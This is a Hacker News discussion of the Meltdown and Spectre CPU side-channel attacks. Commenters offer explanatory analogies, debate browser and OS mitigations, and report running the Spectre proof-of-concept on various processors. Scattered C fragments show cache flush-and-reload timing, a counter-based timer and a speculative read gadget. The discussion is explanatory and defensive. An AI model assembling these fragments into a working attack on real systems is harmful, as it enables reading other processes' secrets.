Reading privileged memory with a side-channel (googleprojectzero.blogspot.com)
2334 points by brandon on Jan 3, 2018 | 593 comments



An analogy that was useful for explaining part of this to my (non-technical) father. Maybe others will find it helpful as well.

Imagine that you want to know whether someone has checked out a particular library book. The library refuses to give you access to their records and does not keep a slip inside the front cover. You can only see the record of which books you have checked out.

What you do is follow the person of interest into the library whenever they return a book. You then ask the librarian for a copy of the book you want to know whether the person has checked out. If the librarian looks down and says "You are in luck, I have a copy right here!" then you know the person had checked out that book. If the librarian has to go look in the stacks and comes back 5 minutes later with the book, you know that the person didn't check out that book (this time).

The way to make the library secure against this kind of attack is to require that all books be reshelved before they can be lent out again, unless the current borrower is requesting an extension.

There are many other ways to use the behavior of the librarian and the time it takes to retrieve a book to figure out which books a person is reading.

edit: A closer variant. Call the library pretending to be the person and ask for a book to be put on hold. Then watch how long their next visit to the library takes. If they came for that book, they will be in and out in a minute (and perhaps a bit confused); if they didn't want that book, it will take 5 minutes.


Your analogy is more apt for side-channel attacks in general. Here is a more specific version for Meltdown:

A library has two rooms, one for general books and one for restricted books. The restricted books are not allowed out of the library, and no notes or recordings are allowed to be taken out of the restricted room.

An attacker wants to sneak information out of the restricted room. To do this they pick up a pile of non-restricted books and go into the restricted room. Depending on what they read in there, they rearrange the pile of non-restricted books into a particular order. A guard comes along and sees them; they are thrown out of the restricted room, and their pile of non-restricted books is put on the issue desk ready to be put back into circulation.

Their conspirator looks at the order of the books on the issue desk and decodes a piece of information about the book in the restricted room. They repeat this process about 500000 times a second until they have transcribed the secret book.


I don't understand this explanation :/ Why is the room considered restricted if you can go inside? Do I know all the books that exist in the library? How does the order of the thrown-out books pertain to the secret book?


> Why is the room considered restricted if you can go inside?

That's the bug. The guard only checks to see whether you're supposed to have access after you walk in and start (speculatively) rearranging books. One way to fix this bug would be to have the guard check your access at the door.


What is the analogy behind being able to go into the restricted room?


The restricted room is the part of the machine behind the protection boundary. Memory reads are not checked at the time of access. They are checked when the instruction retires.


On Intel, that is. This isn't a property intrinsic to superscalar processors; other architectures check it in flight or while the instruction is in the issue queue, preventing this side channel.


You can call into the kernel.

edit: s/call into/trigger a syscall/


You don't even need to do that for meltdown.


I don't understand how this info can be used to get what was inside the book. If my understanding of your explanation is correct, the book name is analogous to a memory address. When the victim (legit process) returned the book with name X (called free on the mem block X), the librarian (OS) erased all pages of the book and repurposed it for printing another book before handing it out to the evil dude (snooping process).


My attempt, assuming that the books only contain one character each:

The librarian has a list of books you're not allowed to take out. You request one of those books (book X), but it takes a while for the search to run to see whether you're allowed to or not. While you're waiting, you say "actually, I'm not really interested in taking out book X, but if the content of that book is 'a', I'd like to take out book Y. If the content of that book is 'b', I'd like to take out book Y+1, and so on".

The librarian is still waiting for the search to complete to see if you can take out book X, but doesn't have anything better to do, so looks inside it, sees that the letter is 'b', and goes and gets book Y+1 so she can hand it over to you.

Now, the original check to see if you can take the first book out completes, and the librarian says "I'm sorry, I can't let you have book X, and I can't give you the book I fetched that you are allowed to take out, otherwise you'd know the content of the forbidden book."

Now, you request book 'Y', which you are allowed to take out. The librarian goes away for a few minutes, returns with book 'Y', and hands it over to you. You request book 'Y+1', and she hands it over immediately. You request book 'Y+2', and she goes away for a few minutes again, and hands it over.

You now know that Y+1 was (probably) the book she fetched when you made the forbidden request, and therefore that the letter inside the forbidden book was 'b'.
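
To map the analogy back to code: here's a minimal C sketch of the "shelf of books" half, i.e. a flush-and-probe array (names and the threshold are made up; the transient, faulting access in the middle is left as a comment because it cannot run as ordinary code):

    #include <stdint.h>
    #include <x86intrin.h>

    #define STRIDE 4096                /* one "book" per page, so the
                                          prefetcher can't guess neighbours */
    static uint8_t probe[256 * STRIDE];

    /* Step 1: "reshelve" every book, i.e. flush the probe array. */
    static void flush_probe(void) {
        for (int i = 0; i < 256; i++)
            _mm_clflush(&probe[i * STRIDE]);
    }

    /* Step 2 happens transiently and faults if executed normally:
     *     value = *(uint8_t *)forbidden_address;
     *     (void)probe[value * STRIDE];    // fetch "book Y + value"
     */

    /* Step 3: time each book; the one already "on the desk" is fast. */
    static int recover_byte(uint64_t threshold) {
        int hit = -1;
        for (int i = 0; i < 256; i++) {
            volatile uint8_t *p = &probe[i * STRIDE];
            uint64_t t0 = __rdtsc();
            (void)*p;
            if (__rdtsc() - t0 < threshold)
                hit = i;               /* cache hit => this was the byte */
        }
        return hit;
    }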


Great explanation - thank you. One thing I don't understand is how this can be exploited from JavaScript. Does it have timing primitives so fine that it can tell the difference between a memory lookup served from memory vs from cache?


Yes, it does, because JavaScript execution has had to become very fast. Fast means you can run a very tight loop that updates a counter to create a fairly high-resolution clock.
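
The same trick sketched in C (the browser version uses a web worker and a SharedArrayBuffer instead of a pthread; names are made up):

    #include <pthread.h>
    #include <stdatomic.h>
    #include <stdint.h>

    static _Atomic uint64_t ticks;

    /* The "clock": a thread that does nothing but count. */
    static void *tick_loop(void *arg) {
        (void)arg;
        for (;;)
            atomic_fetch_add_explicit(&ticks, 1, memory_order_relaxed);
        return NULL;
    }

    /* A "timestamp" is just the current counter value; the resolution
       is one loop iteration, i.e. a handful of CPU cycles. */
    static uint64_t now(void) {
        return atomic_load_explicit(&ticks, memory_order_relaxed);
    }

Start tick_loop with pthread_create, then subtract two now() readings to time a memory access.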


What I don't understand is how the branch predictor is even exploitable from JavaScript -- it doesn't have pointers. How can it "request" arbitrary memory locations and time the results?


It has byte arrays and indexing on those, which is equivalent to having pointers. See pages 6 and 7 of the Spectre paper.
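
In other words (a sketch, names made up):

    #include <stddef.h>
    #include <stdint.h>

    /* arr may be 16 bytes long, but nothing stops a speculatively
       executed read from using idx = 0x100000: base-plus-index
       addressing is pointer arithmetic, so arr[idx] == *(arr + idx). */
    uint8_t peek(const uint8_t *arr, size_t idx) {
        return arr[idx];
    }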


So the mid-term fix for JS JITs should be to gimp indexed array access to the point where an out-of-bounds index value can never enter speculative execution, right? I'm no expert in these low-level things, but I imagine that speculative execution happens only from conditional jumps, and that alternative bounds assurances should be possible that reliably stall the pipeline without allowing speculative access - e.g. using base+idx%len as the eventual address, or limiting it to a sandbox-owned region using a few bitmasks. Obviously this comes at considerable performance cost, but the JIT should be able to whitelist certain safe access patterns and/or trusted code sources to not let this get out of hand. Am I missing something?
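
A branchless clamp along those lines is possible. A minimal sketch, assuming a 64-bit size_t, an arithmetic right shift on signed types, and idx and len both below 2^63 (the helper name is made up):

    #include <stddef.h>
    #include <stdint.h>

    /* Yields idx when idx < len and 0 otherwise, with no branch for
       the CPU to mispredict: idx - len is negative exactly when the
       index is in bounds, so the sign-extending shift produces an
       all-ones mask in that case and zero otherwise. */
    static size_t clamp_index(size_t idx, size_t len) {
        size_t mask = (size_t)((int64_t)(idx - len) >> 63);
        return idx & mask;
    }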


I believe they made their own "good enough" clock out of a loop in a webworker.


Thanks, this was a great explanation, really simplified it!


I understood with your explanation, thanks!


The person checking out the book is a program, so they aren't the brightest.

They check out the book called "how to go to facebook.com". Then they check out "how to type a password". Then they check out "Typing '1234' for Dummies".

I bet you'll never figure out how to get into their facebook account.


Fantastic explanation of cache timing attacks. This morning I was explaining Spectre to non-technical people, and let me tell you, "leaking L1 CPU cache memory" is a real party starter. So I'm using their librarian example going forward.


I used your explanation in a longer note, "Spectre: How do side-channel attacks work?"[^1] to try and explain how side-channel attacks work (partly to myself, and partly to non-hackers).

[^1]: https://www.facebook.com/notes/petrus-theron/spectre-how-do-...


Thanks for the heads up!


Thank you for this. Would you say this applies to both Spectre and Meltdown, or one and not the other?


This is a general explanation of side channel attacks, as I understand.


Yeah, I don't think it is a perfect analogy for Meltdown. I'll try one; someone correct me if I'm misunderstanding Meltdown.

Let's say you want to know if your boss is away on vacation next week, so you call their admin and say "you need to double-check my contact info if the boss is going to be out next week". They load up the boss' calendar to check and, based on his presence next week, then load up your info. Only once done do they take the time to remember the boss didn't want you to know whether they are in or out. So you hear back, "sorry, can't tell you that", but you follow up with "OK, well can you still double-check that my phone number is..."

If they respond quickly with a yes, then your file is still on their screen and the boss is in fact out next week. If there is a short pause while they look it up, then the opposite.


A timing attack is one type of side channel attack. These types of timing attacks can also be used against poor/unsuitable crypto functions, or even some processes involving general computation e.g. If it takes longer to reject input A than input B, you can reason that input A is closer to the answer (similar to someone reading a paragraph until they reach the first error).

Other side-channel attacks can come in the form of analysing network data, power-consumption (CPUs use more power when they are "busier")... even noise (listen for when the fans start spinning up).
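
To make the "reject input A slower than input B" case concrete, a minimal C sketch of a leaky comparison next to a constant-time one (function names are made up):

    #include <stddef.h>

    /* Leaky: returns as soon as a byte differs, so the running time
       reveals the length of the matching prefix. */
    int leaky_compare(const unsigned char *a, const unsigned char *b, size_t n) {
        for (size_t i = 0; i < n; i++)
            if (a[i] != b[i])
                return 0;
        return 1;
    }

    /* Constant-time: always touches every byte and accumulates the
       differences, so timing is independent of where they differ. */
    int ct_compare(const unsigned char *a, const unsigned char *b, size_t n) {
        unsigned char diff = 0;
        for (size_t i = 0; i < n; i++)
            diff |= a[i] ^ b[i];
        return diff == 0;
    }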


Is blinding the only real solution to most of these attacks against Crypto?


Yes, this is a general explanation of side channel attacks against some kind of caching. The more specific example tries to be closer to the type of situation that happens in Spectre, but it is not a direct analogy.


Papers describing each attack:

https://meltdownattack.com/meltdown.pdf

https://spectreattack.com/spectre.pdf

From the spectre paper:

>As a proof-of-concept, JavaScript code was written that, when run in the Google Chrome browser, allows JavaScript to read private memory from the process in which it runs (cf. Listing 2).

Scary stuff.


"Meltdown" is an Intel bug.

"Spectre" is very bad news and affects all modern CPUs. Mitigation is to insert mfence instructions throughout jit generated sandboxed code making it very slow, ugh. Otherwise assume that the entire process with jit generated code is open to reading by that code.

Any system which keeps data from multiple customers (or whatever) in the same process is going to be highly vulnerable.


> Mitigation is to insert mfence instructions throughout jit generated sandboxed code making it very slow, ugh.

Here's the synchronized announcement from Chrome/Chromium: https://sites.google.com/a/chromium.org/dev/Home/chromium-se...

"Chrome's JavaScript engine, V8, will include mitigations starting with Chrome 64, which will be released on or around January 23rd 2018. Future Chrome releases will include additional mitigations and hardening measures which will further reduce the impact of this class of attack. The mitigations may incur a performance penalty."

Chrome 64 will be hitting stable this month, which means that it ought to be possible to benchmark the performance penalty via testing in Chrome beta. Anybody tried yet?


The mitigations are to disable SharedArrayBuffer and severely round performance.now(). Not good that there aren’t other less intrusive ways to mitigate.


I don't get the impression that those are the full extent of the changes though; I think those two were called out only because they're API changes rather than implementation details. Haven't checked the code so I could be wrong, of course.


A little bit more info can be found here [1]. In particular, site isolation [2] will also assist in protecting against this vulnerability.

[1] https://support.google.com/faqs/answer/7622138#chrome [2] http://www.chromium.org/Home/chromium-security/site-isolatio...


Would it be practical to run each JavaScript VM in its own sandbox?

Edit: Apparently you can already do something like this. It seems to be an option for Chrome starting with 63 (which was an October release, I believe):

http://www.chromium.org/Home/chromium-security/site-isolatio...


That can't be right, because they already round performance.now(), so the Spectre attack didn't use it (it instead used a web worker with a tight loop incrementing a counter).


The tight-loop iteration used a SharedArrayBuffer to provide a high-resolution timer, specifically to deal with the obvious fix of truncating the precision of performance.now().

The reason for /further/ truncating performance.now() is that the relative cost in this attack means that you don't need as much precision as was needed for the original (page table? I think) attack.

A SAB timer just needs to increment a counter in one thread and read it in the host thread; the granularity is however long it takes to get through a for-loop.


Thanks, I missed how important SAB was to their webworker timer.


> ...severely round performance.now().

This sucks, and is a side-effect that I didn't even think about. I guess it's probably pretty effective, but it will make benchmarking a lot harder, since you'll probably now have to do a lot more runs.


If it was a big issue you can always introduce a 'benchmark mode' switch that allows you to put resolution back into the counter when you want to run a benchmark. Display a 'WARNING BROWSER INSECURE IN THIS MODE' banner for good measure.


Doubt that. The Firefox news said they will round to 20 us.

That's much more accurate than necessary to benchmark any software code.
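
For reference, rounding a timestamp to a 20 us grid is just flooring it (a sketch with a hypothetical helper; performance.now() reports milliseconds):

    #include <math.h>

    /* 20 us == 0.02 ms; snap the reading down to that granularity. */
    double coarsen_ms(double t_ms) {
        const double res_ms = 0.02;
        return floor(t_ms / res_ms) * res_ms;
    }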


Those are the mitigations firefox is doing. Is chrome doing the same?


For some reason, performance.now() and even the performance profiler are capped at 1 millisecond precision on my machine, which makes both pretty much useless. Can only get better for me. :|


From the article it seems it is not 100% sure that AMD and ARM are not affected by Meltdown, only that the authors could not trigger the issue; they mention this:

"However, for both ARM and AMD, the toy example as described in Section 3 works reliably, indicating that out-of-order execution generally occurs and instructions past illegal memory accesses are also performed."


I would think that any sane implementation would not transmit privileged data to waiting instructions.

Look at their Listing 2: Instructions 5 - 7 will be waiting for the privileged data from line 4 (they are not speculatively executed since they have a data dependency on line 4).

So why is Intel releasing the privileged data to the waiting instructions? An answer could be that violation checking is delayed until retire, but other implementations are possible.

Anyway, so it could be that AMD and ARM are vulnerable, but it's possible that they are not.


There are two different issues.

1. Intel only (so far): prefetching privileged memory.

2. More or less everyone: speculatively executing code that has variable execution time.


> I would think that any sane implementation would not transmit privileged data to waiting instructions.

The point of VIPT caches is exactly to use data before all the checks are completed.

It's easy to judge the sanity of things ex post, but maybe it's not that easy if it took 20 years to find the issue.


I don't believe for a second that nobody came up with this idea before. I believe that nobody until now had the motivation to spend the time actually trying to confirm that it's a problem by developing a PoC. Most people would have given up on the idea simply because CPU vendors are not expected to make such a fundamental mistake.


The mistake is clear from the design - that's why all CPU vendors are vulnerable to variants of the same bugs.

Previously side channel attacks like this have been seen by the security community as unreliable things which only work in very specific cases and have to be averaged over millions of runs.

This attack shows a side channel which is general purpose, reliable, and fast.


> The mistake is clear from the design

There is no fundamental reason why speculative instructions should be allowed to mutate the cache.

OTOH the contention-based side channel attack on speculation has been public knowledge for over a decade. [1]

[1] Z. Wang and R. B. Lee, "Covert and Side Channels Due to Processor Architecture," 2006 22nd Annual Computer Security Applications Conference (ACSAC'06), Miami Beach, FL, 2006, pp. 473-482. doi: 10.1109/ACSAC.2006.20


> There is no fundamental reason why speculative instructions should be allowed to mutate the cache.

There is: hundreds of instructions can be in flight speculatively at the same time, especially if you take hyperthreading into account. Good luck rolling them all back.

The question is not whether the cache should be mutated during speculative execution. It's what kinds of speculative execution are allowed, and in some cases it's not even clear if fences should be placed by the programmer (whack-a-mole style), the compiler (not sure how) or the processor (probably not). It's non-obvious enough that how to solve it is to some extent a research problem.


As for Meltdown, it was well known even before this that speculative execution has to stop at security boundaries.


> Mitigation is to insert mfence instructions throughout jit generated sandboxed code making it very slow, ugh. Otherwise assume that the entire process with jit generated code is open to reading by that code.

It seems like keeping untrusted code in a separate address space would be a suitable workaround? A lot of comments here seem to be implying that Meltdown-style reading of separate address spaces is possible via Spectre, and my read is that it isn't.


No, the Spectre paper discusses cross-process attacks too. First, you use BTB poisoning to coerce the victim process to branch-mispredict to code of your choice (a "gadget"). You can get that code to load memory of your choice, which can be the code of shared libraries (which are usually loaded only once into physical memory for all processes). Then you can do timing attacks using the last-level cache to determine whether that memory is in cache.

It's certainly not easy, but it's doable.
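
The last-level-cache timing step is a FLUSH+RELOAD probe on memory shared between attacker and victim (e.g. a cache line inside a shared library). A minimal sketch; the threshold is a made-up tuning parameter, and real code serializes the timestamp reads:

    #include <stdint.h>
    #include <x86intrin.h>

    /* Returns nonzero if the victim touched this line since the last
       call: a fast RELOAD means the line was already in cache. */
    static int probe_line(volatile uint8_t *line, uint64_t threshold) {
        uint64_t t0 = __rdtsc();
        (void)*line;                      /* RELOAD: time the access */
        uint64_t dt = __rdtsc() - t0;
        _mm_clflush((const void *)line);  /* FLUSH: reset for next round */
        return dt < threshold;
    }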


This is mitigatable if the attacker process can't send a memory address to the victim process, right? Even if you can poke at the memory for cache-prediction misses, if you can't control what the victim process accesses, it seems harder to exploit.

We're all talking about how Spectre is this magic "get access to any memory from any process". But it looks to me like it's a new class of attack, that still requires specific entry points for the software you're trying to attack.

I'd like to be proven wrong on this, but it _feels_ like this is more of a software thing, like other timing bugs. In theory you can write software that isn't vulnerable.

EDIT: my reading of the "JS Spectre implementation" is "JIT code runs in the process of the browser + you can write JS code to read the process's own memory". I can imagine messiness with extensions (1Password in particular).


I don't think so. My understanding from the paper is that you don't need to explicitly send a memory address to the victim, you just need a way to communicate with it (e.g. via a socket or some other API) in a way that causes it to do a branch.

Before you trigger the victim process, you perform some steps in your own, hostile, process that teaches the branch predictor where a particular branching operation will likely go. Then you trigger the victim process in the way you know will cause a very similar branching operation.

Even though it's operating within an entirely different process, the branch predictor uses what it learnt in the hostile process to predict the branch result in the victim process. It jumps to the address the hostile process taught it, and starts to speculatively execute code there. Eventually, it figures out it guessed wrong, but by then it's too late, and the information has leaked via a side-channel in a way that the hostile process can detect.

So, essentially, you're using the branch predictor's cache to send the memory address. And you're not sending it to the victim process, you're sending it directly to the CPU. The victim process will never even know it's been attacked, because the branch predictor hides the consequences of its incorrect guess from being detected by conventional means.


this still seems off to me.

I get that the victim process' branch prediction can be messed with. But if my victim process is:

   password = "password"
   secret = "magic BTC wallet secret key"
   while True:
       password_attempt = input()
       if constant_time_compare(password, password_attempt):
           print(secret)
And my input is something like:

    import sys
    result = ""
    while True:
        ch = sys.stdin.read(1)
        if ch in ('\n', ''): break
        result += ch
Then at no point is the victim program really exposing any pointer logic, so not even the victim process will be accessing the `secret` during execution, let alone the hostile process.

The examples given all include arrays provided by the hostile program, and some indexing into the arrays. I definitely see this being an issue in syscalls, but if that's the scope of this, I wouldn't call Spectre a "hardware bug" any more than other timing attacks would be hardware bugs.


The victim code doesn't need to have some explicit pointer arithmetic; it just has to have some sequence of bytes, somewhere in its address space (the "gadget"), that can be used to read a memory address based on a value stored in a register that can be affected by input supplied from the hostile process. The branch prediction is used to speculatively execute that code. The "Example Implementation on Windows" section in the Spectre paper goes into more detail about this.
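
Written out as C, the kind of gadget being described might look like this sketch; the victim never calls it architecturally, the attacker just steers speculation into code with this effect (names are made up):

    #include <stddef.h>
    #include <stdint.h>

    /* If speculation reaches here with attacker-influenced registers
       (addr = address to read, probe = attacker-observable buffer),
       the transient loads encode one secret byte into which cache
       line of probe[] gets warmed. */
    void gadget(const uint8_t *addr, uint8_t *probe) {
        uint8_t v = *addr;              /* read the chosen address */
        (void)probe[(size_t)v * 4096];  /* leave a cache footprint */
    }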


After skimming the articles it sounds like a lot hinges on just how hard Spectre is to pull off in practice/in the wild. Anyone have any insights on that?


I don't know much about this particular flaw, but I imagine it'll be pretty hard until someone releases an exploit kit, and then pretty easy after that.


It's an arms race, there will always be new ways of exploiting this flaw in unexpected ways unless speculation is disabled entirely on existing CPUs.


They say they can reliably read memory around 120kB/s with one vulnerability and 1kB/s with the other. It just works, all the time. Some of the PoC takes a few minutes to initialize.

I'd say difficulty level is easy.


However, only one of the PoCs runs on AMD, and that doesn't cross process boundaries.

So how easy is it to turn that PoC into something I should worry about? Seems like browsers are the most affected by this scenario, but that also means hardening the browser (separate process per page) might make it difficult to exploit.


As a general rule of thumb, if everyone already has a PoC, you should assume someone has been doing targeted practical attacks for a while.


Difficulty to exploit is easy once you have the exploit running. Writing a new exploit is really hard; otherwise we wouldn't be starting 2018 with this news.


It doesn't look that hard, and in any case, we will suffer the mitigation consequences either way.


Worse, no mitigation will ever be complete against Spectre, short of flat-out disabling speculation across memory loads.


With the right new instructions inserted at the right place, assisted by a good type system, and a processor that does not share its resources like crazy in highly uncontrolled ways, this seems fixable.

Sadly, I feel the only part that won't happen will be the programming language part, but who knows.


It isn't. There have been a few PoCs referenced on Twitter, and the Spectre paper itself references a PoC in browser-hosted JavaScript (e.g. a random ad can scan memory).

It's obviously not a free, zero-time activity, but I'm going to assume someone making an ad to scan memory isn't super concerned about end-user CPU usage or battery life.


"Spectre" is very bad news and affects all modern CPUs

It's not yet clear whether it affects all modern CPUs; notably, I have yet to see any mention of modern POWER/MIPS/SPARC-based designs. If someone has pointers, those particular cases would probably be quite interesting.


https://access.redhat.com/security/vulnerabilities/speculati...

Additional exploits for other architectures are also known to exist. These include IBM System Z, POWER8 (Big Endian and Little Endian), and POWER9 (Little Endian).


It affects CPUs that do speculative execution. Pretty sure some POWER chips do.


I wonder to what degree some systems are affected. I believe Solaris already uses separate address spaces on SPARC for user and kernel. I haven’t looked over the SPARC architecture manual to see if they allow speculative execution beyond privilege boundaries.


That only prevents reading across the higher privilege boundary (the Meltdown vulnerability); it doesn't protect against the arbitrary userland reads from Spectre.


I've thrown the C code in the Spectre paper up if anyone wants to feel the magic: https://gist.github.com/ErikAugust/724d4a969fb2c6ae1bbd7b2a9...


Just tested this on systems of varying age.

Works on processors going back as far as 2007 (the oldest I have access to now is an Athlon 64 X2 6000+), but the example code relies on an instruction that the Atom D510 does not support.

Because Spectre seems to be an intrinsic problem with out-of-order execution, which is almost as old as the FDIV bug in Intel processors, I would be very surprised if the Atom D510 did not turn out to be susceptible using other methods as outlined in the paper.

EDIT: I originally suspected this instruction was CLFLUSH and erroneously claimed the D510 doesn't support SSE2. It does support SSE2, so it must be that it does not support the RDTSCP instruction used for timing.

EDIT: This gets very interesting. I made some modifications to use a CPUID followed by RDTSC, which now runs without illegal instructions and works everywhere the previous version worked. On the D510, however, it runs but I cannot get the leak to happen despite exploring values of CACHE_HIT_THRESHOLD. Could the Atom D510 really be immune to Spectre?
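
For reference, the CPUID-followed-by-RDTSC substitution looks something like this (a sketch using GCC's cpuid.h; CPUID is a serializing instruction, and RDTSC then reads the timestamp counter on CPUs that lack RDTSCP):

    #include <stdint.h>
    #include <cpuid.h>
    #include <x86intrin.h>

    static inline uint64_t serialized_rdtsc(void) {
        unsigned a, b, c, d;
        __cpuid(0, a, b, c, d);   /* serialize: drain in-flight work */
        return __rdtsc();         /* then read the timestamp counter */
    }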


The D510 might not have speculative execution. https://en.wikipedia.org/wiki/Bonnell_(microarchitecture)


Certain Atom CPUs have neither speculative execution nor OoO execution.


Thanks for this. Would love an annotated version of this if anyone is up for it. My C is pretty good, but some high level "what is being done here" and "this is what shouldn't work" comments would be cool to see.


Worked on an Intel(R) Celeron(R) CPU 847 @ 1.10GHz.

With "gcc (GCC) 7.2.1 20171128", remove the parenthesis from CACHE_HIT_THRESHOLD macro[1] to compile correctly.

[1]: https://gist.github.com/ErikAugust/724d4a969fb2c6ae1bbd7b2a9...


Worked on my system.

(Set cache_hit_threshold to the default value of 80, my cpu is an Intel i7-6700k.)


I thought it was supposed to be exploitable by JavaScript? If you can get to the machine and run C code, well, that doesn't seem like an exploit?


At its core both vulnerabilities are essentially local privilege escalation bugs (i.e. a random process can read e.g. secret keys from another process), but that still is a very important exploit - if I can run unprivileged C code on e.g. AWS and am able to read the memory of someone else running on the same shared machine, that's really bad.

The Javascript case is the main one that makes it remotely exploitable.


My understanding is it's anything that can make a running process mis-train the CPU core and read the values back. Consider, for example, shared hosts without separate process pools, running code from different users with the same interpreter processes.


Just because it runs in a C PoC does not mean it only runs in C.


From the Spectre whitepaper:

> In addition to violating process isolation boundaries using native code, Spectre attacks can also be used to violate browser sandboxing, by mounting them via portable JavaScript code. We wrote a JavaScript program that successfully reads data from the address space of the browser process running it.

The whitepaper doesn't contain example JS code, however.


This whitepaper describes the Javascript exploit in Section IV. I'm struggling to understand it though: http://www.cs.vu.nl/~herbertb/download/papers/anc_ndss17.pdf


This too was provided as a proof of concept (without explanation): https://brainsmoke.github.io/misc/slicepattern.html. I'm not sure what I'm looking at though


This is the first implementation in Javascript I have seen so far: http://xlab.tencent.com/special/spectre/js/check.js


At its core both vulnerabilities are essentially privilege escalation bugs (i.e. a random process can read e.g. secret keys from another process), but the Javascript case is the one that makes it remotely exploitable.


It is.


Works on an Intel® Core™2 Duo Processor T7200. Had to replace __rdtscp(&junk) with __rdtsc(); the Core 2 doesn't have the former.


Works on MacOS 10.13.2.

Looking back, the Mac patches were to address KPTI (Meltdown), which is separate from Spectre.


Terrifyingly, this seems to work on a DigitalOcean droplet. I'm assuming this means people could potentially read memory from other VMs on the same system, albeit with a great deal of difficulty.


So... it reads a string that was declared at the top of the file?


I think this means we should consider all browser processes to be completely insecure, until mitigations are applied (e.g. Chrome's Site Isolation: https://www.chromium.org/Home/chromium-security/ssca).

Looks like any session token/state could be exfiltrated from your Gmail tab to a malicious JS app running in-process, for example.

Am I overreacting here?


> Am I overreacting here?

Still skimming the paper, but the JS attack appears to be processor-intensive (please chime in if you interpret it differently!). Any widespread, indiscriminate use of such an attack in the wild seems like it would eventually be detected as surely as client-side cryptocurrency mining was discovered. If you aren't a valuable target, if you don't visit sites that are shady enough to discreetly mine bitcoin in your browser, and if you use an adblocker to defang rogue advertisers, then you probably shouldn't lose too much sleep over this (which is not intended to diminish how awesome (in the biblical sense) this attack is).

That said, if there were ever a time to consider installing NoScript, now's the time: https://addons.mozilla.org/en-US/firefox/addon/noscript/


And if you're a web developer, now is a good moment to make sure your site works correctly when JS is disabled.


We'll have to dig a time machine out and go back to 1998 then.

I'm being a facetious ass. But you know I'm not wrong, either.


You are wrong. Install the NoScript extension and you can see your site without js. NoScript also allows you to selectively enable js per site on a temporary or permanent basis. This is the default way that I and many other people browse the web.

https://noscript.net/


Just looking around, generally available figures for the public internet (as opposed to Tor) suggest that anywhere between 0.1% and 1.0% of users have JS disabled. These numbers have also been consistently going down over time. That's a fairly small number to dictate how a system should be designed.


That depends on your target demographic. JS is more frequently disabled among tech-literate customers, so a cloud provider's home page would probably benefit from working without JS.


> These numbers have also been consistently going down over time.

That trend might reverse if vulnerabilities like these continue to surface.


Right. It’s like designing for any other tiny group: color blind, blind, people who don’t read any of the 3 languages your site is already translated to, etc.

I'm not saying that shouldn't be done, but business-wise it's probably usually best to instead add design changes for the latest smartphone screen.

The web isn't a hypertext graph anymore; it's a large JavaScript program with a thin HTML front now.


I think you’re misunderstanding. The person you’re replying to wasn’t saying you couldn’t disable JavaScript. They are saying the websites they and many in the industry develop won’t work like that and haven’t since the turn of the century. That’s what they were claiming to be not wrong about, and they aren’t. Turning on NoScript shows the problem but doesn’t solve it.


"Turn of the century"? JS was used for little more than swapping images on mouseover and changing/"animating" title bar text back then. The "you will see absolutely nothing or a ream of {{blah}} text" without js enabled really only became prevalent in the last 5-or-so years. Even in the halcyon days of jQuery usage you could get around quite comfortably without js, as js was still being used to augment webpages rather than replace them entirely.


It wasn't common practice, but fully Javascript rendered applications were a thing as early as 2001. That was when my company developed the first one that I know of. It was a godawful ugly pig but it worked.

Most sites did nothing like that, but they did use Javascript and would break in various ways without it. At that time, there were a lot of people admonishing web developers to test their applications with Javascript disabled. Sort of like now.

ETA: I had to look it up - XHR was first available in IE 5 as an ActiveX control. The internet at large couldn't really expect it to be available but I believe that is where we first used it.

Initial release: March 18, 1999; 18 years ago


Before XHR, there was an iframe trick that could be used to the same effect. We were abusing that to do streaming updates (stalling requests until the server had new data) on the likes of IE5 back in 2004. WebSocket, eat your heart out! :-)


I'm not denying that the technology was sort of there (especially/only if you were writing a corporate app that targeted one and only one browser, probably as a replacement for an in-house VB/WinForms app). My point, which you mostly reinforced, was that it was not at all common for a user opting not to enable javascript to see a completely broken public-facing site until relatively recently.


That doesn't make the effort required of a developer to remove an existing JS dependency any easier, though, other than allowing them to see how the site breaks which can already be done using the F12 dev tools.

A lot of sites rely on JS to function even at a basic level these days and I think the parent was saying it's unlikely that that's going to change.


As a developer, it's even easier to test without Javascript: open Chrome Developer Tools, select Settings from the hamburger menu, and check "Disable Javascript".

As the other comments point out, though, the biggest problem is that this is economically irrational for most site owners. The figures on JS-disabled usage I had when I was still at Google (3+ years ago now) were at the lower end of TikiTDO's range. It generally doesn't make economic sense to spend developer time on an experience used by 0.1% of users, particularly if this requires compromises for the 99.9% of users who do have JS enabled.


Culling all that JS can make things faster for everyone.

If you have a web app there’s no point, but if you’re displaying text and images and your site doesn’t work without JS, you’ve over-egged a solved problem.

(... While increasing perceived latency, especially for mobile users.)


I'd bet a certain percentage of THOSE were actually lynx/links/elinks users rather than NoScript users.


You are better off with uMatrix, which gives the user significantly more control over what loads/executes: https://github.com/gorhill/uMatrix

(it's the more advanced version of uBlock, from the same dev)


The old NoScript. The new WebExtension-compatible version just blocks; it has no way to disable JS.


I browse with NoScript and quite a lot of the web works just fine, in fact. I can selectively enable JavaScript for sites that need it, and that I trust.


Why was this downvoted? This is clearly true. I am in fact doing it right now. I am sitting in an airport and clicked around 20 different comment sections and articles from HN so that I could read them later. None of them gave any issues. The only js that I decided to allow was from HN so that I could expand/hide comments.

Does this mean that all websites work? Of course not. But this allows the user to choose which sites to allow to run js. I'm not going to pretend that this is an easy task for non-technical users, but we should be promoting these kinds of habits, not scoffing at them. We should educate as many users as possible that they can still (for now) control much of the web-based code executing on their machines.


Well, it's a severe case of confirmation bias. The people I know that use NoScript-like tools whitelist sites and third parties, which makes it seem like it works better than it really does. Furthermore, they choose not to visit sites that work poorly. All the problems are visible as a new user; sure, it's obviously possible to use NoScript, but I need to whitelist too many sites to be able to say it actually works.


Some sites like NYT wouldn't even render text (!) for me by default with noscript on.

Then there was that time when I read on HN about Forbes loading 35 MB worth of crap (lots of JS too) when you first access it; sure enough, it's completely broken with NoScript too if you don't allow it.


Yes please!

Long live progressive enhancement and graceful degradation.

At least until we get a JS interpreter with proper permission controls and sandbox limits. Something closer to how Lua is embedded sounds nice.


It seems like practical attacks rely on having a reasonably precise timer available. The spectre paper uses SharedArrayBuffer to synthesize a timer, which is a recent and obscure feature:

https://groups.google.com/a/chromium.org/forum/#!topic/blink...

https://groups.google.com/forum/#!topic/mozilla.dev.platform...

Chrome and Firefox's "intent to ship" posts both contain claims to the effect that there probably aren't any really serious timing channel attacks, which... seems to have been disproved. Why isn't SharedArrayBuffer already being disabled as a stopgap? I think users can turn it off in Firefox; how about Chrome?


SharedArrayBuffer will be disabled by default as a stopgap:

https://blog.mozilla.org/security/2018/01/03/mitigations-lan...

performance.now() accuracy is also being reduced.


> I think users can turn it off in firefox, how about Chrome?

